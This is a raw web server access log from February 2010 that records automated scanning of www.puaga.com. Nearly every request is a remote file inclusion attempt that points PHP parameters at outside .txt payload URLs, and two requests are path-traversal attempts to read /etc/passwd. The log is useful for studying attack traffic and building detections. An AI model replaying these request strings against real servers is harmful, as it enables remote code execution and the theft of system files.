66.244.236.248 - - [24/Feb/2010:06:00:28 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:06:00:28 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:06:00:29 -0800] "GET /logs/access_100218.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [24/Feb/2010:06:00:30 -0800] "GET /logs/access_100126.log//////appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [24/Feb/2010:06:00:30 -0800] "GET /////appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.255.116.109 - - [24/Feb/2010:06:00:35 -0800] "GET /logs//////appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:06:00:36 -0800] "GET /logs/access_100121.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:00:53 -0800] "GET /index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:00:53 -0800] "GET /logs/access_100119.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:01:07 -0800] "GET /logs/access_100125.log%20%20/index.php?_REQUEST=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:01:08 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:01:08 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:01:09 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:01:11 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:01:11 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:01:11 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:01:55 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:01:55 -0800] "GET /logs/access_100218.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:01:55 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:02:05 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:02:05 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:02:05 -0800] "GET /logs/access_100218.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:02:22 -0800] "GET /logs/access_100121.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:06:02:33 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:06:02:33 -0800] "GET /logs/access_100218.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.244.236.248 - - [24/Feb/2010:06:02:33 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:36 -0800] "GET /logs//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:37 -0800] "GET /logs/access_100204.log%20%20//index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:37 -0800] "GET /index.php?option=com_magazine&Itemid=&mosConfig_absolute_path=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:42 -0800] "GET /logs/access_100217.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:43 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:44 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:47 -0800] "GET /logs/access_100217.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:47 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:02:47 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:06:02:53 -0800] "GET /logs/errors.php?error=ur%20url%20spread??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:06:02:53 -0800] "GET /errors.php?error=ur%20url%20spread??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:06:02:54 -0800] "GET /errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
211.108.61.176 - - [24/Feb/2010:06:02:54 -0800] "GET /logs/errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:07 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:07 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:08 -0800] "GET /logs/access_100212.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:08 -0800] "GET /logs/access_100209.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:03:09 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:13 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [24/Feb/2010:06:03:13 -0800] "GET /logs/access_100121.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:06:03:14 -0800] "GET /modules/Forums/admin/admin_words.php?phpbb_root_path=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:14 -0800] "GET /logs/access_100203.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.15 - - [24/Feb/2010:06:03:16 -0800] "GET /modules/Forums/admin/admin_words.php?phpbb_root_path=./../../../../../../../../etc/passwd HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:03:32 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:03:37 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:03:42 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:50 -0800] "GET /logs/access_100209.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:50 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:51 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:03:51 -0800] "GET /logs/access_100212.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:04:32 -0800] "GET /logs/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:04:32 -0800] "GET /logs/access_100212.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:04:32 -0800] "GET /errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.193.152 - - [24/Feb/2010:06:04:34 -0800] "GET /logs/access_100209.log%20%20/errors.php?error=http://www.umbertomiceli.it/ecommerce/eeng/heheh.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:05:15 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:05:15 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:05:16 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:05:34 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:05:34 -0800] "GET /logs/access_100218.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:05:34 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:05:51 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:06:22 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:06:22 -0800] "GET /logs/index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:06:22 -0800] "GET /index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:07:02 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:07:02 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:07:03 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:07:06 -0800] "GET /logs/access_100121.log//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:07:20 -0800] "GET /logs/index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:07:20 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [24/Feb/2010:06:07:21 -0800] "GET /index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:07:31 -0800] "GET /logs/access_100131.log%20%20/index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:07:31 -0800] "GET /logs/index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [24/Feb/2010:06:07:31 -0800] "GET /index.php?stranica=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:07:46 -0800] "GET /logs/access_100201.log%20%20///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
201.28.110.99 - - [24/Feb/2010:06:07:47 -0800] "GET /logs/access_100126.log%20%20///admin/index.php?_SERVER[DOCUMENT_ROOT]=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:07:59 -0800] "GET /logs/access_100125.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:08:27 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:08:32 -0800] "GET /logs/access_100218.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:08:32 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:08:33 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:08:40 -0800] "GET /logs/access_100209.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:09:34 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [24/Feb/2010:06:09:42 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:10:13 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:10:36 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:10:37 -0800] "GET /logs/access_100121.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:10:37 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:10:47 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:11:07 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:11:07 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:11:07 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:11:10 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:11:10 -0800] "GET /logs/access_100121.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:11:10 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:06:11:10 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:11:13 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:11:13 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:11:13 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/des/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:12:54 -0800] "GET /view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:12:54 -0800] "GET /logs/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [24/Feb/2010:06:12:54 -0800] "GET /logs/access_100213.log%20%20/view.php?dir=http://www.neosemitech.com/board/data/session/bss/des/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:13:09 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:13:09 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:13:09 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.43.89.13 - - [24/Feb/2010:06:13:17 -0800] "GET /logs/access_100202.log//bbs/delete_comment.php?board_skin_path=http://www.destockdetout.com//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:13:21 -0800] "GET /logs/access_100201.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:13:23 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [24/Feb/2010:06:13:25 -0800] "GET /logs/access_100126.log//?_SERVER[DOCUMENT_ROOT]=http://www.sanvan.net/new/cok.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.115.6.13 - - [24/Feb/2010:06:13:35 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.puaga.com"
